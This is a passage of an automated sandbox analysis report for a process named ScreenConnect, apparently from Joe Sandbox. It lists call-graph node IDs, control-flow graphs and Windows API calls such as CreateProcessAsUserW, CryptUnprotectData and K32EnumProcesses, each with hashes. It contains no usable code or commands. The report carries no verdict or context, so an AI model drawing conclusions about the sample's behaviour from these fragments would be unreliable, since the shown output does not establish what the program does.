37873->37874 37875 137b9c5 37874->37875 37875->37858 37877 137b3af 37876->37877 37878 1376f00 2 API calls 37877->37878 37879 137b3cc 37878->37879 37880 1376f00 2 API calls 37879->37880 37881 137b3de 37880->37881 37881->37871 37884 137eace 37882->37884 37883 137eb06 37883->37863 37884->37883 37890 137eb50 37884->37890 37888 137eace 37886->37888 37887 137eb06 37887->37863 37888->37887 37889 137eb50 2 API calls 37888->37889 37889->37887 37891 137eb8e 37890->37891 37897 137f788 37891->37897 37892 137ee2f 37893 137edb7 37893->37892 37901 3c009f8 37893->37901 37906 3c00a08 37893->37906 37898 137f7b3 37897->37898 37899 137f7ac 37897->37899 37898->37893 37899->37898 37900 137f930 2 API calls 37899->37900 37900->37898 37902 3c00a07 37901->37902 37903 3c009be 37901->37903 37904 3c00510 2 API calls 37902->37904 37903->37893 37905 3c00a45 37904->37905 37905->37893 37907 3c00a2d 37906->37907 37908 3c00510 2 API calls 37907->37908 37909 3c00a45 37908->37909 37909->37893 38027 1376d50 38028 1376d7b 38027->38028 38029 1376d74 38027->38029 38029->38028 38030 1376f00 2 API calls 38029->38030 38031 1376f69 2 API calls 38029->38031 38030->38028 38031->38028 38032 3c05f28 38033 3c05f4c 38032->38033 38034 3c05f5c 38032->38034 38035 3c05f55 38033->38035 38040 3c06558 2 API calls 38033->38040 38041 3c0648a 2 API calls 38033->38041 38042 3c0643b 2 API calls 38033->38042 38043 3c064df 2 API calls 38033->38043 38044 3c06558 38034->38044 38050 3c0648a 38034->38050 38056 3c064df 38034->38056 38062 3c0643b 38034->38062 38040->38033 38041->38033 38042->38033 38043->38033 38046 3c0658b 38044->38046 38047 3c0657b 38044->38047 38045 3c06584 38045->38033 38049 137f930 2 API calls 38046->38049 38047->38045 38048 137f930 2 API calls 38047->38048 38048->38047 38049->38047 38051 3c06454 38050->38051 38053 3c0657b 38051->38053 38055 137f930 2 API calls 38051->38055 38052 3c06584 38052->38033 38053->38052 38054 137f930 2 API calls 38053->38054 38054->38053 38055->38053 38058 3c06566 38056->38058 38057 3c06584 38057->38033 38059 3c0657b 38058->38059 38061 137f930 2 API calls 38058->38061 38059->38057 38060 137f930 2 API calls 38059->38060 38060->38059 38061->38059 38063 3c06454 38062->38063 38065 3c0657b 38063->38065 38067 137f930 2 API calls 38063->38067 38064 3c06584 38064->38033 38065->38064 38066 137f930 2 API calls 38065->38066 38066->38065 38067->38065 38068 3c005aa 38069 3c00572 38068->38069 38071 3c005b3 38068->38071 38073 3c067df 2 API calls 38069->38073 38074 3c06860 38069->38074 38070 3c0057a 38073->38070 38076 3c06886 38074->38076 38075 3c068fb 38075->38070 38076->38075 38077 3c06998 2 API calls 38076->38077 38077->38075 37918 58460a8 37920 58460dc 37918->37920 37921 58460cc 37918->37921 37919 58460d5 37926 5846218 37920->37926 37933 5846228 37920->37933 37921->37919 37924 5846218 4 API calls 37921->37924 37925 5846228 4 API calls 37921->37925 37924->37921 37925->37921 37927 584624d 37926->37927 37929 584625d 37926->37929 37928 5846256 37927->37928 37954 5845628 37927->37954 37928->37921 37940 5846398 37929->37940 37947 58463a8 37929->37947 37934 584624d 37933->37934 37936 584625d 37933->37936 37935 5846256 37934->37935 37937 5845628 ProcessIdToSessionId 37934->37937 37935->37921 37938 5846398 2 API calls 37936->37938 37939 58463a8 2 API calls 37936->37939 37937->37934 37938->37934 37939->37934 37945 58463d2 37940->37945 37946 58463bf 37940->37946 37941 58463c8 37941->37927 37942 584653a K32EnumProcesses 37943 5846572 37942->37943 37943->37927 37945->37946 37957 5845634 37945->37957 37946->37941 37946->37942 37952 58463d2 37947->37952 37953 58463bf 37947->37953 37948 58463c8 37948->37927 37949 584653a K32EnumProcesses 37950 5846572 37949->37950 37950->37927 37951 5845634 K32EnumProcesses 37951->37952 37952->37951 37952->37953 37953->37948 37953->37949 37955 58465e0 ProcessIdToSessionId 37954->37955 37956 5846653 37955->37956 37956->37927 37958 58464e8 K32EnumProcesses 37957->37958 37960 5846572 37958->37960 37960->37945 37910 53522b8 37911 5352300 WaitNamedPipeW 37910->37911 37912 53522fa 37910->37912 37913 5352334 37911->37913 37912->37911 37914 5350d24 37915 53508b8 37914->37915 37916 5350945 37915->37916 37917 3c066f0 2 API calls 37915->37917 37917->37916 37961 3c06773 37962 3c0678b 37961->37962 37964 3c067df 37961->37964 37965 3c067c1 37964->37965 37967 3c067ff 37964->37967 37965->37962 37966 3c068fb 37966->37962 37967->37966 37969 3c06998 37967->37969 37970 3c069c8 37969->37970 37972 3c06ac2 37970->37972 37974 3c069dc 37970->37974 37971 3c06b38 37971->37966 37972->37971 37973 3c02970 2 API calls 37972->37973 37975 3c06b26 37973->37975 37978 3c06b42 37974->37978 37979 3c02970 37974->37979 37975->37966 37978->37966 37980 3c02996 37979->37980 37982 137fab8 2 API calls 37980->37982 37981 3c029a2 37982->37981 37983 5352d81 37984 5352d43 37983->37984 37985 5352d8f 37983->37985 37986 5352de6 37985->37986 37988 53531f8 37985->37988 37989 5353207 37988->37989 37990 53531bb 37988->37990 37989->37990 37991 1377481 2 API calls 37989->37991 37992 1377490 2 API calls 37989->37992 37990->37986 37991->37989 37992->37989 37993 3c016f8 37994 3c01740 CryptProtectData 37993->37994 37995 3c0173a 37993->37995 37996 3c01783 37994->37996 37995->37994

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 63 5351348-53513ce 72 53513d0-53513d2 63->72 73 53513d9-53513e5 63->73 72->73 75 53513e7-53513ee 73->75 76 53513f0-53513f2 73->76 75->76 77 53513f4-53513fb 75->77 78 5351400-5351428 76->78 79 53513fd 77->79 80 535145a-53514b2 77->80 82 5351431 78->82 83 535142a-535142f 78->83 79->78 86 53514b4-53514b7 80->86 87 53514ba-535151f CreateNamedPipeW 80->87 85 5351436-535144a 82->85 83->85 94 535144b call 5351339 85->94 95 535144b call 5351348 85->95 86->87 90 5351521-5351527 87->90 91 5351528-5351549 87->91 88 5351450-5351457 90->91 94->88 95->88
                                                                                    APIs
                                                                                    • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 0535150C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateNamedPipe
                                                                                    • String ID: 4L^q$d/dq
                                                                                    • API String ID: 2489174969-3455392024
                                                                                    • Opcode ID: 33dc75595054f0c85bd2dd2395972e93d38fb1d2ef3c1748797343613989da1d
                                                                                    • Instruction ID: 3b422db7e7b82d4857cca818e6d36e45a98786788d7a5768e7cf499cb5a5196c
                                                                                    • Opcode Fuzzy Hash: 33dc75595054f0c85bd2dd2395972e93d38fb1d2ef3c1748797343613989da1d
                                                                                    • Instruction Fuzzy Hash: 9161B170A003089FCB10CFA9D844B9EBFF6FF88310F14C06AE909AB291D7759905CBA1
                                                                                    APIs
                                                                                    • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 0535033F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 2217836671-0
                                                                                    • Opcode ID: 0a8271b4ff750ff8d483619c767137d1620324b245395c354b58e3a8adfb1bb2
                                                                                    • Instruction ID: 82da59a116e07765bd51afcc7a687f1303c0cd39f56067839ba25530be397ec6
                                                                                    • Opcode Fuzzy Hash: 0a8271b4ff750ff8d483619c767137d1620324b245395c354b58e3a8adfb1bb2
                                                                                    • Instruction Fuzzy Hash: 4B413476900209DFCF10CFA9C884ADEBBF5FF48320F14842AE918A7260D775A955CF90
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0584305D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 36700785f3ef7d283025f1665f04ba1a3467e04cc12a5c083f158f45d525a6b1
                                                                                    • Instruction ID: 67ecde1cf521e863416c03f2e9d21e9ce1004d6db7c56a7db88a3718c3181494
                                                                                    • Opcode Fuzzy Hash: 36700785f3ef7d283025f1665f04ba1a3467e04cc12a5c083f158f45d525a6b1
                                                                                    • Instruction Fuzzy Hash: 3031FF728083898FCB11CFA8C8406DEBFF0EF49314F15809AD894A7262C3349845CFA5
                                                                                    APIs
                                                                                    • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03C0176E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2970487585.0000000003C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_3c00000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataProtect
                                                                                    • String ID:
                                                                                    • API String ID: 3091777813-0
                                                                                    • Opcode ID: c278c7c9536da578daec2f996f9e55cd5f5ca98b463bffbf3eed495d27cc388b
                                                                                    • Instruction ID: 39dbab0059c66b4dc37c17c2dee9fe7151de62cf3b739a9340885165c2160d60
                                                                                    • Opcode Fuzzy Hash: c278c7c9536da578daec2f996f9e55cd5f5ca98b463bffbf3eed495d27cc388b
                                                                                    • Instruction Fuzzy Hash: C32114B6800249DFCB10CF9AC844ADEFBB1FB88310F18852AE959A7250C335A555CFA1
                                                                                    APIs
                                                                                    • CryptProtectData.CRYPT32(?,00000000,?,?,?,?,?), ref: 03C0176E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2970487585.0000000003C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_3c00000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataProtect
                                                                                    • String ID:
                                                                                    • API String ID: 3091777813-0
                                                                                    • Opcode ID: b29449516449ef1c0e38d940977db5c0701f84fad7fe7360f3c8282b8f4da100
                                                                                    • Instruction ID: b0bcf2fd6981c2f01ed6e5461f90839319356045d441a94517ab668e4f8380a9
                                                                                    • Opcode Fuzzy Hash: b29449516449ef1c0e38d940977db5c0701f84fad7fe7360f3c8282b8f4da100
                                                                                    • Instruction Fuzzy Hash: 552107B68002499FCB10CF9AC844ADEFBF5FB48350F14841AE918A7250C335A555CFA5
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0584305D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 455ee9317492eef440a640b5f9c68b4b2bd9c2f519d400aaf7498b88979a3c4e
                                                                                    • Instruction ID: 771a20ef0068ba6187f7f39c7e33fd288f9dec50ff90f9de0b4950b296cfbf25
                                                                                    • Opcode Fuzzy Hash: 455ee9317492eef440a640b5f9c68b4b2bd9c2f519d400aaf7498b88979a3c4e
                                                                                    • Instruction Fuzzy Hash: 3521477680020DDFCF10CF99C844BEEBBF5EB48320F108459EA28A7251C739A995DFA5
                                                                                    APIs
                                                                                    • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0584305D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 8fafe771064d4d969b9819507008d3b6a0b74e26a51b14df84221cbfcdf85cad
                                                                                    • Instruction ID: a0eec511650405d5c9a06b46fff552e73ac8da01baf5d30701dbf2fea5baf594
                                                                                    • Opcode Fuzzy Hash: 8fafe771064d4d969b9819507008d3b6a0b74e26a51b14df84221cbfcdf85cad
                                                                                    • Instruction Fuzzy Hash: 542147B6800209DFCF10CF99C845BEEBBF5EB48320F148419E928A7211C339A995CFA5

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 96 5355f54-5355fbc 97 5356010-5356093 CreateFileA 96->97 98 5355fbe-5355fe3 96->98 105 5356095-535609b 97->105 106 535609c-53560da 97->106 98->97 101 5355fe5-5355fe7 98->101 103 5355fe9-5355ff3 101->103 104 535600a-535600d 101->104 107 5355ff5 103->107 108 5355ff7-5356006 103->108 104->97 105->106 113 53560dc-53560e0 106->113 114 53560ea 106->114 107->108 108->108 109 5356008 108->109 109->104 113->114 115 53560e2 113->115 116 53560eb 114->116 115->114 116->116
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0535607D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: 4L^q
                                                                                    • API String ID: 823142352-616035646
                                                                                    • Opcode ID: 3524bdbdc4c9b26f6d2de499d1e7906f0d18603ac56355a24a692ad8c92ba6a6
                                                                                    • Instruction ID: 47bb84bf55b4c8acfaa05e2b170315dfbef0aa3a6c8a7dad92eec42f7327b74d
                                                                                    • Opcode Fuzzy Hash: 3524bdbdc4c9b26f6d2de499d1e7906f0d18603ac56355a24a692ad8c92ba6a6
                                                                                    • Instruction Fuzzy Hash: B35167B1D002589FDB10CFA9C885B9EBBF1FB48314F248129E819EB261D7B59845CF91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 117 53554a4-5355fbc 119 5356010-5356093 CreateFileA 117->119 120 5355fbe-5355fe3 117->120 127 5356095-535609b 119->127 128 535609c-53560da 119->128 120->119 123 5355fe5-5355fe7 120->123 125 5355fe9-5355ff3 123->125 126 535600a-535600d 123->126 129 5355ff5 125->129 130 5355ff7-5356006 125->130 126->119 127->128 135 53560dc-53560e0 128->135 136 53560ea 128->136 129->130 130->130 131 5356008 130->131 131->126 135->136 137 53560e2 135->137 138 53560eb 136->138 137->136 138->138
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 0535607D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID: 4L^q
                                                                                    • API String ID: 823142352-616035646
                                                                                    • Opcode ID: 1b52e4be0733e0375e83b7a6af7d1c4b551bbe182d71d2a5bdfd5eccf254320b
                                                                                    • Instruction ID: 32df2e660fd81cd193425268f8b4976c14a4593e96720db4152f21c404e5c5cc
                                                                                    • Opcode Fuzzy Hash: 1b52e4be0733e0375e83b7a6af7d1c4b551bbe182d71d2a5bdfd5eccf254320b
                                                                                    • Instruction Fuzzy Hash: 555165B0D04258DFDB10CFA9C845B9EBBF2FB48314F248029E808AB365D7B59845CF91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 597 58463a8-58463bd 598 58463d2-58463d9 597->598 599 58463bf-58463c2 597->599 602 58463de-5846422 call 5845634 598->602 600 584648c-58464a0 599->600 601 58463c8-58463d1 599->601 603 5846466-584646f 600->603 604 58464a2 600->604 621 5846427-584642c 602->621 606 5846471-584648b 603->606 607 58464cc-58464e0 603->607 608 58464ae-58464b7 604->608 611 58464e2-584652e 607->611 612 584653a-5846570 K32EnumProcesses 607->612 611->612 613 5846530-5846538 611->613 615 5846572-5846578 612->615 616 5846579-58465a1 612->616 613->612 615->616 622 5846432-5846435 621->622 623 58464b8-58464c5 621->623 624 58464a4-58464a9 622->624 625 5846437-5846464 622->625 623->607 624->602 625->603 625->608
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d0131ffb3475387b56d214fc6736ba80e188fa2cb37559fbe641148dca5e1a3f
                                                                                    • Instruction ID: f08d4215ad2a1d83bb8e5837aa79d7420776ea017a7550830d38ada7696219ec
                                                                                    • Opcode Fuzzy Hash: d0131ffb3475387b56d214fc6736ba80e188fa2cb37559fbe641148dca5e1a3f
                                                                                    • Instruction Fuzzy Hash: 1D515171A007098FCB24CF6AD8846AEBBF5FB88310F14892ED85AD7651D734E945CF51
                                                                                    APIs
                                                                                    • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 0535033F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcessUser
                                                                                    • String ID:
                                                                                    • API String ID: 2217836671-0
                                                                                    • Opcode ID: 1703805000d4228f7fd8987595c10edc77cf37a9f47e9e804afdac248063dfb2
                                                                                    • Instruction ID: 4df1712e95675c0271cd71e4e5aabfc7f46cb2b078dddf67aa504aeeeaec5003
                                                                                    • Opcode Fuzzy Hash: 1703805000d4228f7fd8987595c10edc77cf37a9f47e9e804afdac248063dfb2
                                                                                    • Instruction Fuzzy Hash: 6D413676900249DFCF11CFA9C884ADEBBF1FF48320F14852AE958A7260D375A955CF90
                                                                                    APIs
                                                                                    • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0584663E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessSession
                                                                                    • String ID:
                                                                                    • API String ID: 3779259828-0
                                                                                    • Opcode ID: 113f76e25c32d66bdaac6d0bf72bfa6395983df4b6cfa68de8761c75533fd66a
                                                                                    • Instruction ID: 1145cd858f4eaf10c7a166a310ea5b23484175976fa628e9c936567b5da85a85
                                                                                    • Opcode Fuzzy Hash: 113f76e25c32d66bdaac6d0bf72bfa6395983df4b6cfa68de8761c75533fd66a
                                                                                    • Instruction Fuzzy Hash: 9F2140B28003498FCB10CFAAC84479EBBF4FB48324F10802ED868A7251D338A945CFA5
                                                                                    APIs
                                                                                    • ConnectNamedPipe.KERNEL32(00000000), ref: 05351F48
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectNamedPipe
                                                                                    • String ID:
                                                                                    • API String ID: 2191148154-0
                                                                                    • Opcode ID: f3329d97490fb2acb30ceacef990014be88bdec9de6b4096d653b423b9c2cd07
                                                                                    • Instruction ID: b36955f40efc3bc9112b1a47730e29942410be925564d19a16deac971fc8a426
                                                                                    • Opcode Fuzzy Hash: f3329d97490fb2acb30ceacef990014be88bdec9de6b4096d653b423b9c2cd07
                                                                                    • Instruction Fuzzy Hash: 482125B0D042589FCB14CFAAD584BDEBBF4AF48310F148069E859AB350DB749945CFA5
                                                                                    APIs
                                                                                    • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 0584655D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumProcesses
                                                                                    • String ID:
                                                                                    • API String ID: 84517404-0
                                                                                    • Opcode ID: 5b5b4bad320e8d2e578001e9e5e4d01aba7d49bc0c3a3b725890c90e833a5f26
                                                                                    • Instruction ID: 39675fb2bc4b1c2e911a96e7faeca4695db3562ee0aa256ff7a6f9a899702fae
                                                                                    • Opcode Fuzzy Hash: 5b5b4bad320e8d2e578001e9e5e4d01aba7d49bc0c3a3b725890c90e833a5f26
                                                                                    • Instruction Fuzzy Hash: 892128B1D002499FDB10CF9AC844AEEFBF4FB49324F10842EE919A7201D3789945CFA5
                                                                                    APIs
                                                                                    • ConnectNamedPipe.KERNEL32(00000000), ref: 05351F48
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConnectNamedPipe
                                                                                    • String ID:
                                                                                    • API String ID: 2191148154-0
                                                                                    • Opcode ID: daecae154dd73700640b40fbc05f2ff44faf8728de478baa5a16989a47a336dd
                                                                                    • Instruction ID: 7a705b7a10a13e322788d3eb8446bf2aba836818877f3a652ae6dcba7751d6a7
                                                                                    • Opcode Fuzzy Hash: daecae154dd73700640b40fbc05f2ff44faf8728de478baa5a16989a47a336dd
                                                                                    • Instruction Fuzzy Hash: F92113B0D042589FCB24CFAAC584B9EBBF5AF48310F14806AE849AB350CB749845CFA4
                                                                                    APIs
                                                                                    • WaitNamedPipeW.KERNEL32(00000000), ref: 0535231F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamedPipeWait
                                                                                    • String ID:
                                                                                    • API String ID: 3146367894-0
                                                                                    • Opcode ID: bb7a5fe0a320dae0375d5c09f776d02a94c7ee2f736c859d95da32d010e8277c
                                                                                    • Instruction ID: 5c75faee17a141c37a595b2a8edc773291e8921cba400018bf452159ba7a69c0
                                                                                    • Opcode Fuzzy Hash: bb7a5fe0a320dae0375d5c09f776d02a94c7ee2f736c859d95da32d010e8277c
                                                                                    • Instruction Fuzzy Hash: 482124B68002498FCB10CF9AC584BDEBBF4FF48320F14846ED969AB241C779A545CFA1
                                                                                    APIs
                                                                                    • WaitNamedPipeW.KERNEL32(00000000), ref: 0535231F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2976469136.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5350000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamedPipeWait
                                                                                    • String ID:
                                                                                    • API String ID: 3146367894-0
                                                                                    • Opcode ID: 93fc62d331249bd03888fc6c4eb325a31d1ba17d3dd12d68c4eb134f2a34ed59
                                                                                    • Instruction ID: 7331965739f505b3ba157259e7fcf0f861f4e4c9bb7001c3a52fa1c0d8ff3824
                                                                                    • Opcode Fuzzy Hash: 93fc62d331249bd03888fc6c4eb325a31d1ba17d3dd12d68c4eb134f2a34ed59
                                                                                    • Instruction Fuzzy Hash: FA2100B6C002098FCB10CF9AC444AEEBBF4FB88324F14846ED969A7251C779A545CFA5
                                                                                    APIs
                                                                                    • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0584663E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2978768000.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_5840000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessSession
                                                                                    • String ID:
                                                                                    • API String ID: 3779259828-0
                                                                                    • Opcode ID: bc1425594e8dfc04881e0500e2891cf0cb76480479107387552fc2bb0c9a44b7
                                                                                    • Instruction ID: 37e37d9e95a4a4971d7cf9f68d80bc98bcd5864402f7b067eac457a7975b83f3
                                                                                    • Opcode Fuzzy Hash: bc1425594e8dfc04881e0500e2891cf0cb76480479107387552fc2bb0c9a44b7
                                                                                    • Instruction Fuzzy Hash: E81112B1C002598FCB20CF9AC445BEEFBF4FB48324F10846AD959A7251D378A944CFA5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2950477734.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_d5d000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 11266e653d128f807777dc9bc88a62acb584ee522b662609aaf7b1bd9716faaa
                                                                                    • Instruction ID: 81248912449b5b32aac2035bca0bfab9cc6638f2279fee4c69b13c73509917c5
                                                                                    • Opcode Fuzzy Hash: 11266e653d128f807777dc9bc88a62acb584ee522b662609aaf7b1bd9716faaa
                                                                                    • Instruction Fuzzy Hash: EC210376504244DFCF25DF14D9C0B26BF66FB98311F248169EC0A4B25AC336D85ACAB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2950477734.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_d5d000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                    • Instruction ID: 2f8bc46243661c78b53cdf9a5063020641498ead0d138c8439ab69aa1266acf3
                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                    • Instruction Fuzzy Hash: F711AF76504280CFCF16CF10D9C4B16BF62FB98324F28C6A9DC094B256C336D85ACBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2950477734.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_d5d000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fcf5cff9c04ab11aeb726f3b06cd51da4a83fd0c7460d8da007e0b422025b1d9
                                                                                    • Instruction ID: a2570ec8abc40573ce0cf07869426d84720371de1be2f527f27169b7407075f1
                                                                                    • Opcode Fuzzy Hash: fcf5cff9c04ab11aeb726f3b06cd51da4a83fd0c7460d8da007e0b422025b1d9
                                                                                    • Instruction Fuzzy Hash: F901F7310083009AEB304A2DC984767BF99EF41325F1CC52AED484B2C6C279D849C6B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.2950477734.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_d5d000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 48cce2b33e67c740dfb9f225ce5c84836b220f997df7429dea68117621f9819b
                                                                                    • Instruction ID: ec75b2ce0c563326c8df3084a6d8a2cc1bdbde1b2d23e1451e7ea83a6e5f8b03
